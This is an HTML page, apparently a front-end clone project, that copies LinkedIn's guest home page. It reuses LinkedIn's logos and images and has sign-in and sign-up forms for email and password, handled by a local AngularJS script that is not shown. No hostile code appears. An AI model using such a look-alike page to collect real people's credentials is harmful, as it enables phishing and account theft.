<!DOCTYPE html>
<html ng-app="ng-index">

<head>
    <meta charset="UTF-8">
    <title>LinkedIn</title>
    <link rel="stylesheet" type="text/css" href="stylesheets/index_style.css">
    <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.3.14/angular.min.js"></script>
    <script src="javascripts/ng-index.js"></script>
</head>

<body class="new-ghome" id="pagekey-guest-home">

<div id="header">
    <div class="container">
        <h1><img src="https://static.licdn.com/scds/common/u/img/logos/logo_132x32_2.png" alt="LinkedIn" class="logo"
                 height="32" width="132"></h1>

        <p class="textad"></p>

        <div class="login">
            <form name="loginForm" ng-controller="SignInFormController as signinCtrl" ng-submit="loginForm.$valid && signinCtrl.submit()" id="login" class="ajax-form">
                <fieldset>
                    <ul id="control_gen_1">
                        <li>
                            <label>Email address</label>

                            <div class="fieldgroup">
                                <span class="error" id="session_key-login-error"></span>
                                <input ng-model="signinCtrl.signinform.email" required type="text" name="session_key" value=""
                                       id="session_key-login" autofocus tabindex="1" size="27">
                            </div>
                        </li>
                        <li>
                            <label for="session_password-login">Password</label>

                            <div class="fieldgroup">
                                <span class="error" id="session_password-login-error"></span>
                                <input ng-model="signinCtrl.signinform.password" required type="password" name="session_password"
                                       value="" id="session_password-login" tabindex="2" size="27">
                            </div>
                        </li>
                        <li class="button">
                            <input type="submit" name="signin" value="Sign In" id="signin" tabindex="3"
                                   class="btn-secondary">
                        </li>
                    </ul>
                </fieldset>
            </form>
        </div>
    </div>
</div>

<div id="main-wrapper">

    <div id="main">
        <header>
            <div id="content">
                <h2>
                    <!--<span class="text-gradient"></span>-->
                    <span class="headline">
                        Connect, share ideas, and discover opportunities.
                    </span>
                </h2>
            </div>
        </header>
        <section>
            <div class="two-row-image">
                <img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_1_150x150_v1.png"
                     width="150" height="150" alt="Male Headshot">
                <img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_2_150x150_v1.png"
                     width="150" height="150" alt="Female Headshot">
                <img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_3_150x150_v1.png"
                     width="150" height="150" alt="Male Headshot">
                <img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_4_150x150_v1.png"
                     width="150" height="150" alt="Female Headshot">
                <img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_5_150x150_v1.png"
                     width="150" height="150" alt="Male Headshot">
                <img src="https://static.licdn.com/scds/common/u/images/apps/home/guesthome/ghp_international_6_150x150_v1.png"
                     width="150" height="150" alt="Male Headshot">
            </div>
        </section>
        <section>
            <div class="jointoday" id="module-id3">
                <div class="header">
                    <h2>Get started – it’s free.</h2>
                </div>
                <div class="content">
                    <p>Registration takes less than 2 minutes.</p>
                    <form ng-controller="SignUpFormController as signupCtrl" ng-submit="coldRegistrationForm.$valid && signupCtrl.submit()"
                          name="coldRegistrationForm" novalidate class="feature" id="guest-home-reg-form">
                        <!--<p>valid {{ coldRegistrationForm.$valid }}</p>-->
                        <fieldset>
                            <legend>Sign Up</legend>
                            <ul>
                                <li id="first-name">
                                    <span class="error" id="firstName-coldRegistrationForm-error"></span>

                                    <div class="fieldgroup">
                                        <input ng-model="signupCtrl.signupform.firstname" required type="text" name="firstName"
                                               value="" id="firstName-coldRegistrationForm" autocomplete="on" size="55"
                                               maxlength="20" tabindex="5" placeholder="First name">
                                    </div>
                                </li>
                                <li id="last-name">
                                    <span class="error" id="lastName-coldRegistrationForm-error"></span>

                                    <div class="fieldgroup">
                                        <input ng-model="signupCtrl.signupform.lastname" required type="text" name="lastName" value=""
                                               id="lastName-coldRegistrationForm" autocomplete="on" size="55"
                                               maxlength="40" tabindex="6" placeholder="Last name">
                                    </div>
                                </li>
                                <li id="email-address">
                                    <span class="error" id="email-coldRegistrationForm-error"></span>

                                    <div class="fieldgroup">
                                        <input ng-model="signupCtrl.signupform.email" required type="email" name="email" value=""
                                               id="email-coldRegistrationForm" autocomplete="on" size="55"
                                               maxlength="128" tabindex="7" placeholder="Email address">
                                    </div>
                                </li>
                                <li id="password">
                                    <span class="error" id="password-coldRegistrationForm-error"></span>

                                    <div class="fieldgroup">
                                        <input ng-model="signupCtrl.signupform.password" required type="password" name="password"
                                               value="" id="password-coldRegistrationForm" tabindex="8"
                                               placeholder="Password (6 or more characters)">
                                    </div>
                                </li>
                            </ul>

                            <div class="form-bottom-row">
                                <p class="action">
                                    <input type="submit" name="" value="Join now" id="btn-submit" class="btn-action"
                                           tabindex="9">
                                </p>
                            </div>
                        </fieldset>
                        <div class="progress-indicator"></div>
                    </form>
                </div>
            </div>
        </section>
    </div>
</div>

    <footer id="ghome-footer">

</footer>

</body>

</html>
